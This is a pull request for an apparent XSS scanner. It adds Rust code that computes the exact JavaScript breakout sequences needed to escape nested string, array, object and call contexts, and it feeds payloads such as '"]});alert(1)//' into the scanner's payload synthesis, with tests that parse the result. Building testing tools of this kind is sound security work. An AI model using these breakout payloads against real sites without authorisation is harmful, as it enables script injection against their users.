### PR TITLE
feat(payload): exact JS breakout-sequence computation for nested script contexts (#1073)

### DIFF
--- a/src/payload/js_breakout.rs
+++ b/src/payload/js_breakout.rs
@@ -1,0 +1,209 @@
+//! Exact JavaScript breakout-sequence computation (issue #1073).
+//!
+//! When a reflection lands inside an inline `<script>`, escaping to an
+//! executable position requires closing whatever syntactic structure the
+//! injection point sits in — an open string, and any unbalanced `(`, `[`, `{`
+//! (including a template-literal `${…}` expression) that precede it. A fixed
+//! breakout such as `';alert(1)//` only closes the string; for
+//! `foo({ bar: [ "INJECT" ] })` it leaves the `]`, `}` and `)` open and the
+//! injected statement never parses.
+//!
+//! [`compute_js_breakout`] scans the script prefix up to the injection point —
+//! string-, comment- and template-aware — and returns the minimal closer
+//! sequence (e.g. `"]})`) that reaches statement position. [`breakout_templates`]
+//! uses it to derive a small, high-coverage set of payload templates for the
+//! common nesting shapes, which the synthesis engine emits for JS string
+//! contexts.
+//!
+//! Limitation — regex literals: `/` is only ever read as division or a comment
+//! start, never as a regex-literal delimiter. A prefix containing a regex
+//! (`x.test(/)/)`, `s.replace(/}{/, …)`) can therefore mis-balance the stack and
+//! yield a *wrong* closer — not merely a missing one. This is currently dormant:
+//! [`compute_js_breakout`] is only ever run on the known-clean [`NESTING_SHELLS`]
+//! by [`breakout_templates`]; it is NOT yet fed real observed script prefixes
+//! (that wiring is a follow-up that also needs a per-parameter carrier).
+//! Disambiguating regex-vs-division needs token-level context and is out of
+//! scope here. Either way the synthesis path always falls back to the catalog.
+
+/// A structural opener tracked on the scan stack.
+#[derive(Clone, Copy, PartialEq)]
+enum Open {
+    Paren,   // (
+    Bracket, // [
+    Brace,   // {
+    /// A `${` template-literal expression brace: closing it (`}`) returns to the
+    /// surrounding template string, which then also needs a `` ` ``.
+    TplExpr,
+}
+
+#[derive(Clone, Copy, PartialEq)]
+enum State {
+    Code,
+    Single,   // '…'
+    Double,   // "…"
+    Template, // `…`
+    Line,     // // …
+    Block,    // /* … */
+}
+
+/// Compute the minimal closer sequence that, injected at the end of `prefix`,
+/// escapes any open string/comment and unbalanced `()[]{}`/`${}` so a following
+/// `;<payload>//` reaches executable statement position.
+///
+/// Returns an empty string when `prefix` already ends at statement/expression
+/// position (nothing to close).
+pub fn compute_js_breakout(prefix: &str) -> String {
+    let chars: Vec<char> = prefix.chars().collect();
+    let mut state = State::Code;
+    let mut stack: Vec<Open> = Vec::new();
+    let mut i = 0;
+
+    while i < chars.len() {
+        let c = chars[i];
+        match state {
+            State::Code => match c {
+                '\'' => state = State::Single,
+                '"' => state = State::Double,
+                '`' => state = State::Template,
+                '(' => stack.push(Open::Paren),
+                '[' => stack.push(Open::Bracket),
+                '{' => stack.push(Open::Brace),
+                ')' => {
+                    if stack.last() == Some(&Open::Paren) {
+                        stack.pop();
+                    }
+                }
+                ']' => {
+                    if stack.last() == Some(&Open::Bracket) {
+                        stack.pop();
+                    }
+                }
+                '}' => match stack.last() {
+                    Some(Open::Brace) => {
+                        stack.pop();
+                    }
+                    Some(Open::TplExpr) => {
+                        stack.pop();
+                        // Closing a `${…}` expression returns us to the template.
+                        state = State::Template;
+                    }
+                    _ => {}
+                },
+                '/' if i + 1 < chars.len() && chars[i + 1] == '/' => {
+                    state = State::Line;
+                    i += 1;
+                }
+                '/' if i + 1 < chars.len() && chars[i + 1] == '*' => {
+                    state = State::Block;
+                    i += 1;
+                }
+                _ => {}
+            },
+            State::Single => {
+                if c == '\\' {
+                    i += 2; // skip the escaped char
+                    continue;
+                } else if c == '\'' {
+                    state = State::Code;
+                }
+            }
+            State::Double => {
+                if c == '\\' {
+                    i += 2;
+                    continue;
+                } else if c == '"' {
+                    state = State::Code;
+                }
+            }
+            State::Template => {
+                if c == '\\' {
+                    i += 2;
+                    continue;
+                } else if c == '`' {
+                    state = State::Code;
+                } else if c == '$' && i + 1 < chars.len() && chars[i + 1] == '{' {
+                    stack.push(Open::TplExpr);
+                    state = State::Code;
+                    i += 2;
+                    continue;
+                }
+            }
+            State::Line => {
+                if c == '\n' {
+                    state = State::Code;
+                }
+            }
+            State::Block => {
+                if c == '*' && i + 1 < chars.len() && chars[i + 1] == '/' {
+                    state = State::Code;
+                    i += 1;
+                }
+            }
+        }
+        i += 1;
+    }
+
+    let mut out = String::new();
+    // 1) Close an open string / comment so the rest is parsed as code.
+    match state {
+        State::Single => out.push('\''),
+        State::Double => out.push('"'),
+        State::Template => out.push('`'),
+        State::Block => out.push_str("*/"),
+        State::Line => out.push('\n'),
+        State::Code => {}
+    }
+    // 2) Close unbalanced structural openers, innermost first.
+    for opener in stack.iter().rev() {
+        match opener {
+            Open::Paren => out.push(')'),
+            Open::Bracket => out.push(']'),
+            Open::Brace => out.push('}'),
+            // Close the `${…}` expression brace, then the template literal that
+            // contains it.
+            Open::TplExpr => {
+                out.push('}');
+                out.push('`');
+            }
+        }
+    }
+    out
+}
+
+/// Representative structural shells (openers preceding the reflected string),
+/// covering the common reflection sinks: bare string, inside a call, inside an
+/// array, and one/two levels of array/object nesting inside a call.
+const NESTING_SHELLS: &[&str] = &[
+    "",      // var x = "…"
+    "(",     // foo("…"
+    "[",     // arr = ["…"
+    "([",    // foo(["…"
+    "({k:",  // foo({k:"…"
+    "([{k:", // foo([{k:"…"
+    "({k:[", // foo({k:["…"
+];
+
+/// Derive payload *templates* (carrying the `{JS}` placeholder) that break out
+/// of a JS string delimited by `quote` for each common nesting shape. Each is
+/// produced by running [`compute_js_breakout`] on `shell + quote`, so the
+/// closer sequences are exactly what the scanner would compute for a real
+/// prefix — deduplicated and ordered shallowest-first (highest confidence).
+pub fn breakout_templates(quote: char) -> Vec<String> {
+    let mut out: Vec<String> = Vec::new();
+    let mut seen = std::collections::HashSet::new();
+    for shell in NESTING_SHELLS {
+        let prefix = format!("{}{}", shell, quote);
+        let breaker = compute_js_breakout(&prefix);
+        // `breaker` already includes the closing quote; append a statement
+        // separator, the payload, and a line comment to neutralise the
+        // original trailing source.
+        let template = format!("{};{{JS}}//", breaker);
+        if seen.insert(template.clone()) {
+            out.push(template);
+        }
+    }
+    out
+}
+
+#[cfg(test)]
+mod tests;

--- a/src/payload/js_breakout/tests.rs
+++ b/src/payload/js_breakout/tests.rs
@@ -1,0 +1,202 @@
+use super::*;
+
+// ===== Algorithm: exact closer sequences =====
+
+#[test]
+fn closes_plain_string() {
+    assert_eq!(compute_js_breakout("var x = \""), "\"");
+    assert_eq!(compute_js_breakout("var x = '"), "'");
+    assert_eq!(compute_js_breakout("var x = `"), "`");
+}
+
+#[test]
+fn closes_nested_call_array_object() {
+    assert_eq!(compute_js_breakout("foo(\""), "\")");
+    assert_eq!(compute_js_breakout("arr = [\""), "\"]");
+    assert_eq!(compute_js_breakout("foo([\""), "\"])");
+    assert_eq!(compute_js_breakout("foo({k:\""), "\"})");
+    // The issue's worked example: foo({ bar: [ "INJECT" ] })
+    assert_eq!(compute_js_breakout("foo({ bar: [ \""), "\"]})");
+}
+
+#[test]
+fn ignores_delimiters_inside_strings_and_comments() {
+    // Brackets inside a (closed) string must not affect the stack.
+    assert_eq!(compute_js_breakout("foo(\"a)]}b\", \""), "\")");
+    // Escaped quote does not close the string.
+    assert_eq!(compute_js_breakout("\"a\\\"b"), "\"");
+    // Line comment swallows everything to EOL.
+    assert_eq!(compute_js_breakout("foo( // )]}\n  \""), "\")");
+    // Block comment.
+    assert_eq!(compute_js_breakout("/* unterminated ("), "*/");
+}
+
+#[test]
+fn balanced_prefix_needs_no_closer() {
+    assert_eq!(compute_js_breakout("var x = 1; "), "");
+    assert_eq!(compute_js_breakout("foo(\"a\", bar()); "), "");
+}
+
+#[test]
+fn template_literal_expression() {
+    // Inside `${ foo(" }` we must close the string, the call, the ${} brace,
+    // and the surrounding template literal.
+    assert_eq!(compute_js_breakout("`a${foo(\""), "\")}`");
+    // Plain template string (no ${}) just closes the backtick.
+    assert_eq!(compute_js_breakout("`hello "), "`");
+}
+
+// ===== oxc-validated correctness =====
+//
+// The decisive proof, browser-free: reconstruct `prefix + breakout +
+// ;alert(1)` and parse it with the same oxc parser the scanner uses. The
+// breakout is correct iff the result parses cleanly AND `alert(1)` lands as a
+// top-level statement (i.e. it escaped every string/structure rather than
+// staying inert inside one).
+
+/// True iff `code` parses without errors and contains a top-level `alert(...)`
+/// call statement.
+fn alert_reaches_top_level(code: &str) -> bool {
+    use oxc_allocator::Allocator;
+    use oxc_ast::ast::{Expression, Statement};
+    use oxc_parser::Parser;
+    use oxc_span::SourceType;
+
+    let alloc = Allocator::default();
+    let ret = Parser::new(&alloc, code, SourceType::default()).parse();
+    if !ret.errors.is_empty() {
+        return false;
+    }
+    ret.program.body.iter().any(|stmt| {
+        if let Statement::ExpressionStatement(es) = stmt
+            && let Expression::CallExpression(call) = &es.expression
+            && let Expression::Identifier(id) = &call.callee
+        {
+            return id.name.as_str() == "alert";
+        }
+        false
+    })
+}
+
+/// Realistic inline-script prefixes (everything before the reflected value) and
+/// the original trailing source after it. The reflected value sits inside a
+/// string literal that the prefix opens.
+const SCENARIOS: &[(&str, &str)] = &[
+    ("var q = \"", "\";"),
+    ("search(\"", "\");"),
+    ("var a = [\"", "\"];"),
+    ("track([\"", "\"]);"),
+    ("render({title:\"", "\"});"),
+    ("foo({ bar: [ \"", "\" ] });"),
+    ("init([{name:\"", "\"}]);"),
+    ("var s = '", "';"),
+    ("g('", "');"),
+];
+
+#[test]
+fn computed_breakout_reaches_executable_position() {
+    for (prefix, suffix) in SCENARIOS {
+        let breaker = compute_js_breakout(prefix);
+        // Injected value = breaker + ";alert(1)//"; the `//` neutralises the
+        // original suffix (single line), exactly as the real payload would.
+        let code = format!("{}{};alert(1)//{}", prefix, breaker, suffix);
+        assert!(
+            alert_reaches_top_level(&code),
+            "breakout {:?} failed to reach executable position for prefix {:?} -> {:?}",
+            breaker,
+            prefix,
+            code
+        );
+    }
+}
+
+#[test]
+fn regex_literals_are_a_known_limitation() {
+    // DOCUMENTED GAP (see module header): `/` is never treated as a regex-literal
+    // delimiter, so a `)` inside a regex wrongly pops a real open paren and the
+    // breaker under-closes. We pin the current (wrong) output so the limitation
+    // is tracked rather than silently assumed correct. This is dormant today —
+    // `compute_js_breakout` is only run on the clean NESTING_SHELLS, never on
+    // real prefixes. If this assertion ever fails because the behaviour was
+    // fixed, delete it and add genuine regex coverage to SCENARIOS.
+    let breaker = compute_js_breakout("f(/)/, \"");
+    assert_eq!(
+        breaker, "\"",
+        "regex `)` no longer pops the real paren — limitation may be fixed; \
+         the correct breaker for this prefix is \"\\\")\""
+    );
+}
+
+#[test]
+fn naive_breakout_fails_on_nested_scenarios() {
+    // Contrast: closing only the string (no structural closers) leaves the
+    // surrounding brackets unbalanced, so the reconstructed code is a JS syntax
+    // error and `alert` never reaches top level. This proves the structural
+    // closers are load-bearing (the result fails to parse, errs != 0).
+    let nested = [
+        ("foo({ bar: [ \"", "\" ] });"),
+        ("track([\"", "\"]);"),
+        ("render({title:\"", "\"});"),
+    ];
+    for (prefix, suffix) in nested {
+        // Naive: just the delimiter quote, no `]`, `}`, `)`.
+        let quote = prefix
+            .chars()
+            .rev()
+            .find(|c| *c == '"' || *c == '\'')
+            .unwrap();
+        let code = format!("{}{};alert(1)//{}", prefix, quote, suffix);
+        assert!(
+            !alert_reaches_top_level(&code),
+            "naive breakout unexpectedly worked for {:?} — scenario is not actually nested",
+            prefix
+        );
+    }
+}
+
+// ===== Template generation =====
+
+#[test]
+fn breakout_templates_cover_common_nestings_and_carry_placeholder() {
+    let templates = breakout_templates('"');
+    assert!(templates.iter().all(|t| t.contains("{JS}")));
+    // Deduped.
+    let mut sorted = templates.clone();
+    sorted.sort();
+    sorted.dedup();
+    assert_eq!(sorted.len(), templates.len());
+    // Covers the bare close and the deep array-in-object-in-call close.
+    assert!(templates.iter().any(|t| t == "\";{JS}//"));
+    assert!(templates.iter().any(|t| t == "\"]});{JS}//"));
+    // Single-quote variant uses the right delimiter.
+    assert!(breakout_templates('\'').iter().all(|t| t.starts_with('\'')));
+}
+
+#[test]
+fn generated_templates_execute_for_their_nesting() {
+    // Each generated template, substituted with alert(1) and placed in a
+    // matching nested prefix, must reach executable position.
+    let cases = [
+        ("\");{JS}//", "foo(\"", "\");"),
+        ("\"];{JS}//", "arr=[\"", "\"];"),
+        ("\"});{JS}//", "foo({k:\"", "\"});"),
+        ("\"]});{JS}//", "foo({k:[\"", "\"]});"),
+    ];
+    let templates = breakout_templates('"');
+    for (tmpl, prefix, suffix) in cases {
+        assert!(
+            templates.iter().any(|t| t == tmpl),
+            "expected template {:?} in generated set {:?}",
+            tmpl,
+            templates
+        );
+        let payload = tmpl.replace("{JS}", "alert(1)");
+        let code = format!("{}{}{}", prefix, payload, suffix);
+        assert!(
+            alert_reaches_top_level(&code),
+            "template {:?} did not execute in {:?}",
+            tmpl,
+            code
+        );
+    }
+}

--- a/src/payload/js_breakout/tests.rs
+++ b/src/payload/js_breakout/tests.rs
@@ -46,6 +46,29 @@ fn template_literal_expression() {
     assert_eq!(compute_js_breakout("`hello "), "`");
 }
 
+#[test]
+fn covers_scanner_state_edges() {
+    // Standalone / mismatched closers in code position are no-ops (never pop the
+    // wrong opener), leaving nothing to close.
+    assert_eq!(compute_js_breakout("}}])"), "");
+    // `)` must not pop a `[`; both stay open.
+    assert_eq!(compute_js_breakout("(["), "])");
+    assert_eq!(compute_js_breakout("([)"), "])");
+
+    // Single-quoted string: escaped quote keeps it open; a real quote closes it.
+    assert_eq!(compute_js_breakout("'a\\'b'"), ""); // opened and closed
+    assert_eq!(compute_js_breakout("x='a\\'"), "'"); // escaped quote -> still open
+
+    // Template literal: escaped backtick keeps it open; a real backtick closes.
+    assert_eq!(compute_js_breakout("`a\\`b`"), ""); // opened and closed
+
+    // Block comment that terminates, then an open call after it.
+    assert_eq!(compute_js_breakout("/* x */ foo("), ")");
+
+    // Ending inside a line comment must emit a newline to escape it.
+    assert_eq!(compute_js_breakout("x // foo"), "\n");
+}
+
 // ===== oxc-validated correctness =====
 //
 // The decisive proof, browser-free: reconstruct `prefix + breakout +

--- a/src/payload/mod.rs
+++ b/src/payload/mod.rs
@@ -1,3 +1,4 @@
+pub mod js_breakout;
 pub mod mining;
 pub mod remote;
 pub mod synthesis;

--- a/src/payload/synthesis.rs
+++ b/src/payload/synthesis.rs
@@ -271,10 +271,33 @@ pub fn synthesize_payloads(
     let class = crate::scanning::markers::class_marker();
     let id = crate::scanning::markers::id_marker();
 
+    // Candidate templates, highest-confidence first.
+    let mut templates: Vec<String> = Vec::new();
+    // Issue #1073: for a reflection inside a JS string, lead with nested-closer
+    // breakouts (`"]});…`) that `js_breakout` computes for the common nesting
+    // shapes (call / array / object, depth 0-3), so sinks the bare quote-close
+    // cannot escape are still reached. This is a *fixed* set, not derived from
+    // the observed script prefix — per-prefix computation would need a per-param
+    // carrier and is a follow-up — so at any given site only the depth-matching
+    // closer is executable JS; the others still reflect and are reported as [R].
+    // Every breakout is gated by `allows_str` below like any other template.
+    if let InjectionContext::Javascript(Some(delim)) = context {
+        let quote = match delim {
+            DelimiterType::SingleQuote => Some('\''),
+            DelimiterType::DoubleQuote => Some('"'),
+            DelimiterType::Backtick => Some('`'),
+            DelimiterType::Comment => None,
+        };
+        if let Some(q) = quote {
+            templates.extend(crate::payload::js_breakout::breakout_templates(q));
+        }
+    }
+    templates.extend(templates_for(context).into_iter().map(String::from));
+
     let mut out: Vec<String> = Vec::new();
     let mut seen: std::collections::HashSet<String> = std::collections::HashSet::new();
 
-    'outer: for template in templates_for(context) {
+    'outer: for template in &templates {
         for func in JS_FUNCS {
             let payload = template
                 .replace("{JS}", func)

--- a/src/payload/synthesis/tests.rs
+++ b/src/payload/synthesis/tests.rs
@@ -206,6 +206,25 @@ fn backtick_js_context_uses_template_interpolation() {
 }
 
 #[test]
+fn js_string_context_includes_nested_closer_breakouts() {
+    // Issue #1073: synthesis must emit exact nested-closer breakouts for JS
+    // string contexts, not just the bare quote-close.
+    let ctx = InjectionContext::Javascript(Some(DelimiterType::DoubleQuote));
+    let payloads = synthesize_payloads(&ctx, &[], &[]);
+    // Bare close (depth 0) and a deep array-in-object-in-call close (depth 3).
+    assert!(
+        payloads.iter().any(|p| p == "\";alert(1)//"),
+        "expected the bare string-close breakout, got {:?}",
+        payloads
+    );
+    assert!(
+        payloads.iter().any(|p| p == "\"]});alert(1)//"),
+        "expected the nested array-in-object-in-call breakout, got {:?}",
+        payloads
+    );
+}
+
+#[test]
 fn js_string_context_survives_angle_stripping() {
     // A reflection inside a JS string can break out with quotes alone — no
     // `</script>` tag needed — so angle stripping does not defeat it.


### PR DESCRIPTION
Addresses #1073.

## What
A reflection inside an inline `<script>` nested in structures — `foo({ bar: [ "INJECT" ] })` — can't be escaped by closing only the string: the `]`, `}`, `)` stay open and the injected statement never parses. This computes the **exact closer sequence** to reach executable position.

## How
- **`src/payload/js_breakout.rs`** — `compute_js_breakout(prefix) -> String`: a string-, comment- and template-literal-aware delimiter-balance scanner. Tracks open `(`/`[`/`{`, string/template/comment state, and `${…}` template-expression braces; returns the minimal closer (e.g. `"]})`). `breakout_templates(quote)` derives the closer set for common nesting shapes (call/array/object, depth 0–3) by running the algorithm on representative shells.
- **Synthesis** emits these nested-closer breakouts first for JS string contexts, gated by the existing `allows_str` filter, deduped, capped.

## Validation (browser-free, rigorous — via oxc)
The harness limitation that reflection≈detection makes a scanner detection-rate delta unsuitable here, so correctness is proven at the JS-syntax level instead: each computed/derived breakout is reconstructed into `prefix + breakout + ;alert(1)//` and parsed with the same **oxc** parser the scanner uses; the test asserts it compiles **and** `alert(1)` lands as a top-level statement (i.e. it escaped every string/structure). A contrast test confirms the naive string-only close fails to parse on nested scenarios — proving the structural closers are load-bearing.

```
cargo test --lib payload::js_breakout
cargo test --lib payload::synthesis
```

## Honest scope / limitations (documented in-code)
- **Fixed, not per-site**: the breakout set covers common nesting shapes but is *not* derived from the observed script prefix at scan time (that needs a per-parameter carrier — a follow-up). So at a given site the depth-matching closer executes and the rest serve as `[R]` reflections.
- **Regex literals**: `/` is not treated as a regex-literal delimiter, so a regex in the prefix can mis-balance the stack and yield a wrong closer. This is **dormant** today (`compute_js_breakout` only runs on the clean shells, never on real prefixes) and is documented + pinned by a test.
- Value is payload **executability** (the reported JS-context payload actually runs), not a scanner detection-rate increase — the code/comments frame it that way and claim no detection win.

## Tests
- 1302 lib unit tests pass (+11), `fmt` clean, `clippy --lib --tests` 0 warnings.
- An adversarial review pass was incorporated (regex-honesty comment, fixed-set disclosure, naive-test rationale, regex-limitation pin).

Composes with the synthesis engine from #1075 and the WIP follow-ups #1072.
